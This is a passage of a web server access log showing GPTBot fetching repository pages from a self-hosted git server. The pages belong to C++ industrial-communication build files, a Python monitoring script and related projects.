(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44561] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:16:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html?display=source" [Client 74.7.227.38] [Length 34921] [Gzip 9.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:16:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_Final.spec" [Client 74.7.227.38] [Length 25887] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 31693] [Gzip 6.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13130] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12017] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10810] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12509] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 